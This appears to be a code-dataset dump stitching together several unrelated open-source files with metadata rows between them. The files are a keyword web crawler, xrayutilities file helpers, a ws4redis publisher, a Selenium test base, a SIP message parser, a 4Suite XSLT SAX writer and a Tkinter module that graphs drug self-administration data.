if len(opts) == 0:
print 'Use python webcrawler.py -h for help'
sys.exit(2)
except getopt.GetoptError:
print 'Use python webcrawler.py -h for help'
sys.exit(2)
for op,ar in opts:
if op == '-p':
try:
int(ar)
except ValueError:
print 'Error. Page number should be a number'
sys.exit(2)
pageno = ar
elif op == '-k':
keyword = ar
elif op == '-h':
print 'Use python webcrawler.py -p pagenumber -k keyword'
sys.exit(2)
else: assert False, 'unhandled option'
if 'keyword' not in locals():
print 'Keyword not specified try again'
sys.exit(2)
if 'pageno' in locals():
test = 'http://www.shopping.com/products~PG-'+str(pageno)+'?KW='+str(keyword)
else:
test = 'http://www.shopping.com/products?KW=' + str(keyword)
page = urllib2.urlopen(test).read()
soup = BeautifulSoup(page)
if soup.body['id'] == 'noResults':
print 'No results for this keyword'
sys.exit(1)
else:
alltext = soup.get_text()
res = alltext[alltext.find('Results '): alltext.find('Results ')+25]
if 'pageno' in locals():
firstno = makeint(res[res.find('Results ')+8: res.find('-')-1])
lastno = makeint(res[res.find('-')+2:res.find('of ')])
print 'Number of results on page', pageno, ':', lastno-firstno+1
else:
print 'Number of results found', res[res.find('of ')+3:res.find('\n')]
if __name__ == '__main__':
main(sys.argv[1:])
|
gpl-3.0
| -1,612,103,384,303,443,200
| 24.637681
| 81
| 0.594686
| false
| 3.153298
| false
| false
| false
|
dkriegner/xrayutilities
|
lib/xrayutilities/io/helper.py
|
1
|
3315
|
# This file is part of xrayutilities.
#
# xrayutilities is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
#
# Copyright (C) 2013-2019 Dominik Kriegner <dominik.kriegner@gmail.com>
"""
convenience functions to open files for the various data file readers
these functions should be used in new parsers since they transparently allow
opening gzipped, bzipped and xz-compressed files
"""
import bz2
import gzip
import lzma
import h5py
from .. import config
from ..exception import InputError
def xu_open(filename, mode='rb'):
"""
function to open a file no matter if zipped or not. Files with extension
'.gz', '.bz2', and '.xz' are assumed to be compressed and transparently
opened to read like usual files.
Parameters
----------
filename : str
filename of the file to open (full including path)
mode : str, optional
mode in which the file should be opened
Returns
-------
file-handle
handle of the opened file
Raises
------
IOError
If the file does not exist an IOError is raised by the open routine,
which is not caught within the function
"""
if config.VERBOSITY >= config.INFO_ALL:
print("XU:io: opening file %s" % filename)
if filename.endswith('.gz'):
fid = gzip.open(filename, mode)
elif filename.endswith('.bz2'):
fid = bz2.BZ2File(filename, mode)
elif filename.endswith('.xz'):
fid = lzma.open(filename, mode)
else:
fid = open(filename, mode)
return fid
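# Hedged usage sketch (added for illustration, not part of the library): xu_open
# picks gzip/bz2/lzma/plain from the file extension, so callers read compressed
# and plain files identically.  "scan.xrdml.gz" is a made-up file name.
def _xu_open_example(filename="scan.xrdml.gz"):
    with xu_open(filename) as fid:
        return fid.read()  # bytes, decompressed transparently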
class xu_h5open(object):
"""
helper object to decide if a HDF5 file has to be opened/closed when
    used within a 'with' statement.
"""
def __init__(self, f, mode='r'):
"""
Parameters
----------
f : str
filename or h5py.File instance
mode : str, optional
mode in which the file should be opened. ignored in case a file
handle is passed as f
"""
self.closeFile = True
self.fid = None
self.mode = mode
if isinstance(f, h5py.File):
self.fid = f
self.closeFile = False
self.filename = f.filename
elif isinstance(f, str):
self.filename = f
else:
raise InputError("f argument of wrong type was passed, "
"should be string or filename")
def __enter__(self):
if self.fid:
if not self.fid.id.valid:
self.fid = h5py.File(self.filename, self.mode)
else:
self.fid = h5py.File(self.filename, self.mode)
return self.fid
def __exit__(self, type, value, traceback):
if self.closeFile:
self.fid.close()
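# Hedged usage sketch (added for illustration, not part of the library):
# xu_h5open accepts either a file name or an already open h5py.File and only
# closes handles it opened itself.  "data.h5" is a made-up file name.
def _xu_h5open_example(source="data.h5"):
    with xu_h5open(source) as h5:  # opened here, closed again on exit
        return list(h5.keys())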
|
gpl-2.0
| 4,533,434,051,202,780,700
| 28.336283
| 79
| 0.622624
| false
| 4.0625
| false
| false
| false
|
jrief/django-websocket-redis
|
ws4redis/publisher.py
|
2
|
2898
|
#-*- coding: utf-8 -*-
from redis import ConnectionPool, StrictRedis
from ws4redis import settings
from ws4redis.redis_store import RedisStore
from ws4redis._compat import is_authenticated
from redis.connection import UnixDomainSocketConnection
if 'unix_socket_path' in settings.WS4REDIS_CONNECTION:
# rename 'unix_socket_path' to 'path' and pass as args
conn_args = dict(settings.WS4REDIS_CONNECTION,
path=settings.WS4REDIS_CONNECTION['unix_socket_path'])
del conn_args['unix_socket_path']
redis_connection_pool = ConnectionPool(connection_class=UnixDomainSocketConnection, **conn_args)
else:
redis_connection_pool = ConnectionPool(**settings.WS4REDIS_CONNECTION)
class RedisPublisher(RedisStore):
def __init__(self, **kwargs):
"""
Initialize the channels for publishing messages through the message queue.
"""
connection = StrictRedis(connection_pool=redis_connection_pool)
super(RedisPublisher, self).__init__(connection)
for key in self._get_message_channels(**kwargs):
self._publishers.add(key)
def fetch_message(self, request, facility, audience='any'):
"""
Fetch the first message available for the given ``facility`` and ``audience``, if it has
been persisted in the Redis datastore.
The current HTTP ``request`` is used to determine to whom the message belongs.
A unique string is used to identify the bucket's ``facility``.
Determines the ``audience`` to check for the message. Must be one of ``broadcast``,
``group``, ``user``, ``session`` or ``any``. The default is ``any``, which means to check
for all possible audiences.
"""
prefix = self.get_prefix()
channels = []
if audience in ('session', 'any',):
if request and request.session:
channels.append('{prefix}session:{0}:{facility}'.format(request.session.session_key, prefix=prefix, facility=facility))
if audience in ('user', 'any',):
if is_authenticated(request):
channels.append('{prefix}user:{0}:{facility}'.format(request.user.get_username(), prefix=prefix, facility=facility))
if audience in ('group', 'any',):
try:
if is_authenticated(request):
groups = request.session['ws4redis:memberof']
channels.extend('{prefix}group:{0}:{facility}'.format(g, prefix=prefix, facility=facility)
for g in groups)
except (KeyError, AttributeError):
pass
if audience in ('broadcast', 'any',):
channels.append('{prefix}broadcast:{facility}'.format(prefix=prefix, facility=facility))
for channel in channels:
message = self._connection.get(channel)
if message:
return message
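# Hedged usage sketch (added for illustration, not part of this module): the
# publish side for a made-up facility "foobar".  publish_message() and
# RedisMessage are provided by the RedisStore base class in
# ws4redis.redis_store, not defined in this file.
def _publish_example():
    from ws4redis.redis_store import RedisMessage
    publisher = RedisPublisher(facility='foobar', broadcast=True)
    publisher.publish_message(RedisMessage('Hello World'))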
|
mit
| -6,769,983,965,469,551,000
| 48.965517
| 135
| 0.638026
| false
| 4.364458
| false
| false
| false
|
annapowellsmith/openpresc
|
openprescribing/frontend/tests/functional/selenium_base.py
|
1
|
4639
|
import os
import subprocess
import unittest
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from django.conf import settings
# Django 1.11 removes the ability to supply a port range for liveserver tests,
# so we replicate that here. See: https://code.djangoproject.com/ticket/28212
# and https://code.djangoproject.com/ticket/26011
available_test_ports = iter(range(6080, 6580))
def use_saucelabs():
return os.environ.get('TRAVIS') or os.environ.get('USE_SAUCELABS')
@unittest.skipIf(
os.environ.get('TEST_SUITE') == 'nonfunctional',
"nonfunctional tests specified in TEST_SUITE environment variable")
class SeleniumTestCase(StaticLiveServerTestCase):
host = '0.0.0.0'
display = None
@classmethod
def setUpClass(cls):
cls.port = next(available_test_ports)
try:
cls.browser = cls.get_browser()
except Exception:
if cls.display:
cls.display.stop()
raise
cls.browser.maximize_window()
cls.browser.implicitly_wait(1)
super(SeleniumTestCase, cls).setUpClass()
@classmethod
def get_browser(cls):
if use_saucelabs():
return cls.get_saucelabs_browser()
else:
if cls.use_xvfb():
from pyvirtualdisplay import Display
cls.display = Display(visible=0, size=(1200, 800))
cls.display.start()
return cls.get_firefox_driver()
@classmethod
def get_saucelabs_browser(cls):
browser, version, platform = os.environ['BROWSER'].split(":")
caps = {'browserName': browser}
caps['platform'] = platform
caps['version'] = version
caps['screenResolution'] = '1600x1200'
# Disable slow script warning in IE
caps['prerun'] = {
'executable': ('https://raw.githubusercontent.com/'
'ebmdatalab/openprescribing/'
'master/scripts/setup_ie_8.bat'),
'background': 'false'
}
username = os.environ["SAUCE_USERNAME"]
access_key = os.environ["SAUCE_ACCESS_KEY"]
if os.environ.get('TRAVIS'):
caps["tunnel-identifier"] = os.environ.get(
"TRAVIS_JOB_NUMBER", 'n/a')
caps["build"] = os.environ.get("TRAVIS_BUILD_NUMBER", 'n/a')
caps["tags"] = ["CI"]
else:
caps["tags"] = ["from-dev-sandbox"]
if os.environ.get('TRAVIS') or os.path.exists('/.dockerenv'):
hub_url = "%s:%s@saucehost:4445" % (username, access_key)
else:
hub_url = "%s:%s@localhost:4445" % (username, access_key)
return webdriver.Remote(
desired_capabilities=caps,
command_executor="http://%s/wd/hub" % hub_url)
@classmethod
def use_xvfb(cls):
if not os.environ.get('SHOW_BROWSER', False):
return subprocess.call(
"type xvfb-run", shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
else:
return False
@classmethod
def get_firefox_driver(cls):
return webdriver.Firefox(
log_path="%s/logs/webdriver.log" % settings.REPO_ROOT)
@classmethod
def tearDownClass(cls):
cls.browser.quit()
if cls.display:
cls.display.stop()
super(SeleniumTestCase, cls).tearDownClass()
def _find_and_wait(self, locator_type, locator, waiter):
if use_saucelabs():
wait = 60
else:
wait = 5
try:
element = WebDriverWait(self.browser, wait).until(
waiter((locator_type, locator))
)
return element
except TimeoutException:
raise AssertionError("Expected to find element %s" % locator)
def find_by_xpath(self, locator):
return self._find_and_wait(By.XPATH, locator, EC.presence_of_element_located)
def find_visible_by_xpath(self, locator):
return self._find_and_wait(By.XPATH, locator, EC.visibility_of_element_located)
def find_by_css(self, locator):
return self._find_and_wait(By.CSS_SELECTOR, locator, EC.presence_of_element_located)
def find_visible_by_css(self, locator):
return self._find_and_wait(By.CSS_SELECTOR, locator, EC.visibility_of_element_located)
|
mit
| -4,036,378,167,837,115,400
| 34.143939
| 94
| 0.613063
| false
| 3.895046
| true
| false
| false
|
tzewangdorje/SIPserv
|
sipServ/message.py
|
1
|
6199
|
# core
import traceback, random, re
from collections import OrderedDict
# sipServ
from header import HeaderField
from userAgent import UserAgentServer
class Message(object):
def __init__(self, data=None):
        self.identifier = None
self.request = None
self.final = None
self.header = OrderedDict()
self.body = ""
self.sent = False
if data:
self._parse(data)
if not self._validate():
raise Exception('Invalid Message format')
def __repr__(self):
ret = "{\n"
ret = ret+" 'StartLine': '"+self.start_line+"',\n"
ret = ret+" 'Header': {\n"
        for field in self.header.values():
ret = ret+" '"+field.name+"': {\n"
for value in field.values:
ret = ret+" "+str(value)+",\n"
ret = ret+" },\n"
ret = ret+" 'Body': '"+self.body+"'\n"
ret = ret+"}\n"
return ret
def write(self):
ret = self.start_line + "\r\n"
for key,field in self.header.iteritems():
ret = ret + field.write() + "\r\n"
ret = ret + "\r\n"
ret = ret + self.body
return ret
def _parse(self, data):
headerDone = False
start = True
lines = data.splitlines()
for line in lines:
if start:
self.start_line = line
start = False
elif line=="":
headerDone = True
elif headerDone:
self.body = self.body+line
else:
headerField = HeaderField(line)
try:
key = headerField.name.lower()
self.header[key] = headerField
except: # this header field already exists, so add values to the existing one, TO DO
# header[hf.name].append(hf)
print traceback.format_exc()
def _validate(self):
return True
def getUserAgent(self):
return UserAgentServer()
def isRequest(self):
return self.request
def isResponse(self):
return not self.request
def isProvisional(self):
return not self.request and not self.final
def isFinal(self):
return not self.request and self.final
def getId(self):
try:
return self.header["via"].values[0].params["branch"]
except:
return None
class MessageRequest(Message):
def __init__(self, data):
Message.__init__(self, data)
self.request = True
self.requestUri = self.start_line.split(" ")[1]
@property
def addressOfRecord(self):
to = self.header["to"].values[0].value
m = re.search(r"<(.+)>", to)
return m.group(1)
def getReturnIp(self):
via = self.header["via"]
return via.values[0].value.split(" ")[1]
def getReturnPort(self):
via = self.header["via"]
if via.values[0].params["rport"].isdigit():
return via.values[0].params["rport"]
else:
return "5060"
def getReturnTransport(self):
via = self.header["via"]
return via.values[0].value.split(" ")[0].split("/")[2]
class MessageResponse(Message):
@property
def start_line(self):
return "SIP/2.0 "+self.code+" "+self.reasonPhrase
def __init__(self, data):
Message.__init__(self, data)
self.request = False
self.code = ""
self.reasonPhrase = ""
def configureByRequest(self, requestMessage):
self.returnIp = requestMessage.getReturnIp()
self.returnPort = requestMessage.getReturnPort()
self.returnTransport = requestMessage.getReturnTransport()
self.header["via"] = requestMessage.header["via"]
toField = requestMessage.header["to"]
try:
toField.values[0].params["tag"]
except KeyError:
# no dialog tag yet - add one
toField.values[0].params["tag"] = '%x' % random.randint(0,2**31)
self.header["to"] = toField
self.header["from"] = requestMessage.header["from"]
self.header["call-id"] = requestMessage.header["call-id"]
self.header["cseq"] = requestMessage.header["cseq"]
class MessageRequestRegister(MessageRequest):
def __init__(self, data=None):
MessageRequest.__init__(self, data)
self.identifier = "REGISTER"
class MessageRequestInvite(MessageRequest):
def __init__(self, data=None):
MessageRequest.__init__(self, data)
self.identifier = "INVITE"
class MessageResponseProvisional(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "PROVISIONAL"
self.final = False
class MessageResponseSuccess(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "SUCCESS"
self.final = True
class MessageResponseRedirect(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "REDIRECT"
self.final = True
class MessageResponseClientError(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "CLIENT_ERROR"
def configureByRequest(self, requestMessage):
MessageResponse.configureByRequest(self, requestMessage)
if self.code=="405":
            self.header["allow"] = HeaderField("Allow: INVITE,ACK,BYE,CANCEL,OPTIONS")
class MessageResponseServerError(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "SERVER_ERROR"
class MessageResponseGlobalFailure(MessageResponse):
def __init__(self, data=None):
MessageResponse.__init__(self, data)
self.identifier = "GLOBAL_FAILURE"
|
gpl-3.0
| 7,854,859,847,364,854,000
| 28.52381
| 115
| 0.556541
| false
| 4.163197
| false
| false
| false
|
Pikecillo/genna
|
external/4Suite-XML-1.0.2/Ft/Xml/Xslt/SaxWriter.py
|
1
|
7538
|
########################################################################
# $Header: /var/local/cvsroot/4Suite/Ft/Xml/Xslt/SaxWriter.py,v 1.9 2005/03/18 23:47:19 jkloth Exp $
"""
SAX2 event writer for XSLT output
Copyright 2005 Fourthought, Inc. (USA).
Detailed license and copyright information: http://4suite.org/COPYRIGHT
Project home, documentation, distributions: http://4suite.org/
"""
import os
from Ft.Xml import EMPTY_NAMESPACE, XMLNS_NAMESPACE
from Ft.Xml import CheckVersion
from Ft.Xml.Domlette import implementation
from Ft.Xml.Lib.XmlString import IsXmlSpace, SplitQName
from Ft.Xml.XPath import Util
from Ft.Xml.Xslt import XSL_NAMESPACE, TextSax
from Ft.Xml.Xslt import OutputParameters
class ElementData:
def __init__(self, name, attrs, extraNss=None):
self.name = name
self.attrs = attrs
self.extraNss = extraNss or {}
try:
from xml.dom.ext.reader import Sax, Sax2, HtmlSax
except ImportError:
#It will be caught if a SaxWriter is created
pass
class SaxWriter:
"""
Requires PyXML (will be checked at instantiation time).
"""
def __init__(self, outputParams, saxHandler=None, fragment=False):
CheckVersion(feature="4XSLT's SaxWriter")
self.__fragment = fragment
self.__firstElementFlag = True
self.__orphanedNodes = []
self.__saxHandlerClass = None
self.__saxHandler = None
self.__stateStack = []
self.__currElement = None
self.__currText = u''
        self.__outputParams = outputParams or OutputParameters.OutputParameters()
if saxHandler:
self.__saxHandler = saxHandler
elif self.__outputParams.method == 'xml':
self.__initSaxHandler(Sax2.XmlDomGenerator)
if self.__outputParams.omitXmlDeclaration in [None, 'no']:
self.__saxHandler.xmlDecl(
self.__outputParams.version,
self.__outputParams.encoding,
self.__outputParams.standalone
)
elif self.__outputParams.method == 'html':
self.__initSaxHandler(HtmlSax.HtmlDomGenerator)
elif self.__outputParams.method == 'text':
self.__initSaxHandler(TextSax.TextGenerator)
def startDocument(self):
return
def endDocument(self):
return
def complete(self):
return self.__saxHandler and self.__saxHandler.getRootNode() or None
def getResult(self):
self.__completeTextNode()
return self.__saxHandler.getRootNode()
def __initSaxHandler(self, saxHandlerClass):
self.__saxHandlerClass = saxHandlerClass
self.__saxHandler = saxHandlerClass(keepAllWs=1)
for o_node in self.__orphanedNodes:
if o_node[0] == 'pi':
self.__saxHandler.processingInstruction(o_node[1], o_node[2])
elif o_node[0] == 'comment':
self.__saxHandler.comment(o_node[1])
del self.__orphanedNodes
return
def __initSax2Doc(self, doctype):
self.__firstElementFlag = False
if not self.__fragment:
if not self.__saxHandler:
self.__initSaxHandler(Sax2.XmlDomGenerator)
if self.__outputParams.omitXmlDeclaration in [None, 'no']:
self.__saxHandler.xmlDecl(
self.__outputParams.version,
self.__outputParams.encoding,
self.__outputParams.standalone
)
self.__saxHandler.startDTD(doctype, self.__outputParams.doctypeSystem, self.__outputParams.doctypePublic)
self.__saxHandler.endDTD()
return
def __initHtmlSaxDoc(self, doctype):
self.__firstElementFlag = False
if not self.__saxHandler:
self.__initSaxHandler(HtmlSax.HtmlDomGenerator)
#self.__saxHandler._4dom_startDTD(doctype, self.__outputParams.doctypeSystem, self.__outputParams.doctypePublic)
#self.__saxHandler.endDTD()
def __completeTextNode(self):
#FIXME: This does not allow multiple root nodes, which is required to be supported
if self.__currText:
if IsXmlSpace(self.__currText):
self.__saxHandler.ignorableWhitespace(self.__currText)
else:
self.__saxHandler.characters(self.__currText)
self.__currText = u''
return
def startElement(self, name, namespace=EMPTY_NAMESPACE, extraNss=None):
extraNss = extraNss or {}
attrs = {}
if self.__firstElementFlag:
if not self.__outputParams.method:
if not namespace and name.upper() == 'HTML':
self.__outputParams.method = 'html'
else:
self.__outputParams.method = 'xml'
if self.__outputParams.method == 'xml':
self.__initSax2Doc(name)
else:
self.__initHtmlSaxDoc(name)
self.__firstElementFlag = False
self.__completeTextNode()
if self.__currElement:
self.__saxHandler.startElement(self.__currElement.name, self.__currElement.attrs)
self.__currElement = None
self.__currElement = ElementData(name, attrs, extraNss)
if self.__outputParams.method == 'xml':
if namespace:
(prefix, local) = SplitQName(name)
if prefix:
self.__currElement.attrs["xmlns:"+prefix] = namespace
else:
self.__currElement.attrs["xmlns"] = namespace
            for prefix in extraNss.keys():
                # declare the extra namespaces on the pending element's attributes
                if prefix:
                    self.__currElement.attrs[u'xmlns:'+prefix] = extraNss[prefix]
                else:
                    self.__currElement.attrs[u'xmlns'] = extraNss['']
return
def endElement(self, name):
self.__completeTextNode()
if self.__currElement:
self.__saxHandler.startElement(
self.__currElement.name,
self.__currElement.attrs
)
self.__currElement = None
self.__saxHandler.endElement(name)
return
def text(self, text, escapeOutput=True):
if self.__currElement:
self.__saxHandler.startElement(
self.__currElement.name,
self.__currElement.attrs
)
self.__currElement = None
self.__saxHandler.characters(text)
return
def attribute(self, name, value, namespace=EMPTY_NAMESPACE):
self.__currElement.attrs[name] = value
if namespace:
(prefix, local) = SplitQName(name)
if prefix:
self.__currElement.attrs[u"xmlns:"+prefix] = namespace
return
def processingInstruction(self, target, data):
self.__completeTextNode()
if self.__saxHandler:
self.__saxHandler.processingInstruction(target, data)
else:
self.__orphanedNodes.append(('pi', target, data))
return
def comment(self, body):
self.__completeTextNode()
if self.__saxHandler:
self.__saxHandler.comment(body)
else:
self.__orphanedNodes.append(('comment', body))
return
|
gpl-2.0
| -4,203,331,712,846,488,600
| 36.316832
| 120
| 0.568188
| false
| 4.415934
| false
| false
| false
|
DCSR/Analysis
|
GraphsTab.py
|
1
|
13519
|
"""
This file contains all the procedures called from the GraphsTab
There are several ways to graph things. Much of what is in this file draws to a ttk canvas,
in this case self.graphCanvas.
The other way is to use matplotlib.
Index: (alphabetical)
cocaineModel() OK
cumulativeRecord() OK
eventRecords() OK
eventRecordsIntA() OK
histogram() OK
pumpDurationsIntA()  OK
timeStamps() OK
"""
import GraphLib
import model
import ListLib
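# Hedged sketch (added for illustration, not part of the original module): each
# procedure below takes a Tk canvas plus a record object exposing roughly the
# attributes shown here.  All values are made up.
class _ExampleRecord(object):
    fileName = "Box1_session.dat"
    datalist = [[1200, "P"], [64500, "P"], [131000, "P"]]  # [time_ms, event_code] pairs
    cocConc = 5.0         # mg/ml, used by cocaineModel()
    pumpSpeed = 0.000625  # ml/sec, used by cocaineModel()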
def cocaineModel(aCanvas,aRecord,max_x_scale,resolution = 60, aColor = "blue", clear = True, max_y_scale = 20):
if clear:
aCanvas.delete('all')
x_zero = 75
y_zero = 350
x_pixel_width = 500 #700
y_pixel_height = 150 #200
x_divisions = 12
y_divisions = 4
if (max_x_scale == 10) or (max_x_scale == 30): x_divisions = 10
GraphLib.eventRecord(aCanvas, x_zero+5, 185, x_pixel_width, max_x_scale, aRecord.datalist, ["P"], "")
GraphLib.drawXaxis(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, x_divisions, color = "black")
GraphLib.drawYaxis(aCanvas, x_zero, y_zero, y_pixel_height, max_y_scale, y_divisions, True, color = "black")
x_scaler = x_pixel_width / (max_x_scale*60*1000)
y_scaler = y_pixel_height / max_y_scale
cocConcXYList = model.calculateCocConc(aRecord.datalist,aRecord.cocConc,aRecord.pumpSpeed,resolution)
# print(modelList)
x = x_zero
y = y_zero
totalConc = 0
totalRecords = 0
startAverageTime = 10 * 60000 # 10 min
    endAverageTime = 180 * 60000 # 180 min
for pairs in cocConcXYList:
if pairs[0] >= startAverageTime:
if pairs[0] < endAverageTime:
totalRecords = totalRecords + 1
totalConc = totalConc + pairs[1]
concentration = round(pairs[1],2)
newX = x_zero + pairs[0] * x_scaler // 1
newY = y_zero - concentration * y_scaler // 1
aCanvas.create_line(x, y, newX, newY, fill= aColor)
# aCanvas.create_oval(newX-2, newY-2, newX+2, newY+2, fill=aColor)
x = newX
y = newY
aCanvas.create_text(300, 400, fill = "blue", text = aRecord.fileName)
"""
dose = 2.8*aRecord.cocConc * aRecord.pumpSpeed
tempStr = "Duration (2.8 sec) * Pump Speed ("+str(aRecord.pumpSpeed)+" ml/sec) * cocConc ("+str(aRecord.cocConc)+" mg/ml) = Unit Dose "+ str(round(dose,3))+" mg/inj"
aCanvas.create_text(300, 450, fill = "blue", text = tempStr)
"""
averageConc = round((totalConc/totalRecords),3)
# draw average line
X1 = x_zero + (startAverageTime * x_scaler) // 1
Y = y_zero-((averageConc) * y_scaler) // 1
X2 = x_zero + (endAverageTime * x_scaler) // 1
# aCanvas.create_line(X1, Y, X2, Y, fill= "red")
# tempStr = "Average Conc (10-180 min): "+str(averageConc)
# aCanvas.create_text(500, Y, fill = "red", text = tempStr)
def cumulativeRecord(aCanvas,aRecord,showBPVar,max_x_scale,max_y_scale):
aCanvas.delete('all')
# graphCanvas is 800 x 600
x_zero = 50
y_zero = 550
x_pixel_width = 700
y_pixel_height = 500
x_divisions = 12
if (max_x_scale == 10) or (max_x_scale == 30): x_divisions = 10
y_divisions = 10
aTitle = aRecord.fileName
GraphLib.drawXaxis(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, x_divisions)
GraphLib.drawYaxis(aCanvas, x_zero, y_zero, y_pixel_height, max_y_scale, y_divisions, True)
GraphLib.cumRecord(aCanvas, x_zero, y_zero, x_pixel_width, y_pixel_height, max_x_scale, max_y_scale, \
aRecord.datalist,showBPVar, aTitle)
def eventRecords(aCanvas,aRecordList,max_x_scale):
# graphCanvas is 800 x 600
aCanvas.delete('all')
x_zero = 50
x_pixel_width = 700
x_divisions = 12
if (max_x_scale == 10) or (max_x_scale == 30): x_divisions = 10
GraphLib.drawXaxis(aCanvas, x_zero, 550, x_pixel_width, max_x_scale, x_divisions)
y_zero = 30
box = 0
# eventRecord(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, datalist, charList, aLabel)
# aTitle = aRecord.fileName
for record in aRecordList:
y_zero = y_zero + 40
box = box + 1
aTitle = "Box "+str(box)
GraphLib.eventRecord(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, record.datalist, ["P"], aTitle)
def eventRecordsIntA(aCanvas,aRecord):
# graphCanvas is 800 x 600
aCanvas.delete('all')
x_zero = 75
x_pixel_width = 600
x_divisions = 12
max_x_scale = 5
x_divisions = 5
GraphLib.drawXaxis(aCanvas, x_zero, 550, x_pixel_width, max_x_scale, x_divisions)
y_zero = 50
for block in range(12):
aTitle = str(block+1)
pump_timestamps = ListLib.get_pump_timestamps(aRecord.datalist,block)
GraphLib.eventRecord(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, pump_timestamps, ["P","p"], aTitle)
y_zero = y_zero + 45
def histogram(aCanvas, aRecord,max_x_scale,clear = True):
"""
Draws a histogram using the datalist from aRecord.
To Do: There is another histogram procedure in GraphLib. Should be merged.
"""
def drawBar(aCanvas,x,y, pixelHeight, width, color = "black"):
aCanvas.create_line(x, y, x, y-pixelHeight, fill=color)
aCanvas.create_line(x, y-pixelHeight, x+width, y-pixelHeight, fill=color)
aCanvas.create_line(x+width, y-pixelHeight, x+width, y, fill=color)
if clear:
aCanvas.delete('all')
# Draw Event Record
x_zero = 75
y_zero = 100
x_pixel_width = 700
y_pixel_height = 200
x_divisions = 12
y_divisions = 5
if (max_x_scale == 10) or (max_x_scale == 30): x_divisions = 10
aCanvas.create_text(200, y_zero-50 , fill = "blue", text = aRecord.fileName)
GraphLib.eventRecord(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, aRecord.datalist, ["P"], "")
# Populate bin array
binSize = 1 # in minutes
intervals = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
T1 = 0
numInj = 0
numIntervals = 0
outOfRange = 0
totalIntervals = 0
for pairs in aRecord.datalist:
if pairs[1] == "P":
numInj = numInj + 1
T2 = pairs[0]
if T1 > 0:
numIntervals = numIntervals + 1
                interval = round((T2-T1)/(binSize*60000),3) # interval in minutes, rounded to three decimal places
totalIntervals = totalIntervals + interval
index = int(interval)
if index < len(intervals)-1:
intervals[index] = intervals[index]+1
else:
outOfRange = outOfRange+1
T1 = T2
tempStr = "Number of Injections = "+str(numInj)
aCanvas.create_text(450, y_zero-50, fill = "blue", text = tempStr)
# print("Number of Inter-injection Intervals =",numIntervals)
# print("Inter-injection Intervals = ",intervals)
meanInterval = round(totalIntervals / numIntervals,3)
x_zero = 75
y_zero = 450
x_pixel_width = 400
y_pixel_height = 300
max_x_scale = 20
max_y_scale = 20
x_divisions = 20
y_divisions = max_y_scale
labelLeft = True
GraphLib.drawXaxis(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, x_divisions, color = "black")
GraphLib.drawYaxis(aCanvas, x_zero, y_zero, y_pixel_height, max_y_scale, y_divisions, labelLeft, color = "black")
# intervals = [0,1,2,3,4,5,6,5,4,3,2,1,0,0,0,0,0,0,0,1] #Used for test without loading a file
unitPixelHeight = int(y_pixel_height/y_divisions)
width = int(x_pixel_width/len(intervals))
for i in range(len(intervals)):
x = x_zero + (i*width)
drawBar(aCanvas,x,y_zero,intervals[i]*unitPixelHeight,width)
#Draw OutOfRange Bar
x = x_zero + (len(intervals)*width) + 20
drawBar(aCanvas,x,y_zero,outOfRange*unitPixelHeight,width)
tempStr = "Mean interval (min) = "+ str(meanInterval)
aCanvas.create_text(200, y_zero-y_pixel_height, fill = "red", text = tempStr)
rate = round(60/meanInterval,3)
tempStr = "Rate (inj/hr) = "+str(rate)
aCanvas.create_text(450, y_zero-y_pixel_height, fill = "blue", text = tempStr)
aCanvas.create_line(x_zero+int(width*meanInterval), y_zero, x_zero+int(width*meanInterval), y_zero-y_pixel_height+20, fill="red")
tempStr = "Each Bin = "+str(binSize)+" minute"
aCanvas.create_text(250, y_zero+50, fill = "blue", text = tempStr)
def pumpDurationsIntA(aCanvas,aRecord):
aCanvas.delete('all')
pump_timelist = ListLib.get_pump_duration_list(aRecord.datalist, -1)
duration_list = []
for data in pump_timelist:
duration_list.append(data[2])
x_zero = 75
y_zero = 50
x_pixel_width = 600
x_divisions = 12
max_x_scale = 5
x_divisions = 5
GraphLib.drawXaxis(aCanvas, x_zero, 550, x_pixel_width, max_x_scale, x_divisions)
x_scaler = x_pixel_width / (max_x_scale*60*1000)
y_zero = 50
block = 0
for block in range(12):
x = x_zero
y = y_zero
aLabel = str(block+1)
pump_timelist = ListLib.get_pump_duration_list(aRecord.datalist,block)
aCanvas.create_text(x_zero-30, y_zero-5, fill="blue", text = aLabel)
for data in pump_timelist:
newX = (x_zero + data[1] * x_scaler // 1)
aCanvas.create_line(x, y, newX, y)
height = int(data[2]/40)
aCanvas.create_line(newX, y, newX, y-height)
x = newX
y_zero = y_zero + 45
def timeStamps(aCanvas,aRecord,max_x_scale):
# graphCanvas is 800 x 600
aCanvas.delete('all')
x_zero = 100
y_zero = 550
x_pixel_width = 650
x_divisions = 12
if (max_x_scale == 10) or (max_x_scale == 30): x_divisions = 10
# Axis at (100,550)
GraphLib.drawXaxis(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, x_divisions, color = "black")
startTime = 0;
if len(aRecord.datalist) > 0:
firstEntry=(aRecord.datalist[0])
if (firstEntry[1] == 'M'):
startTime = firstEntry[0]
#print("StartTime =",startTime)
topRow = 40
spacing = 18
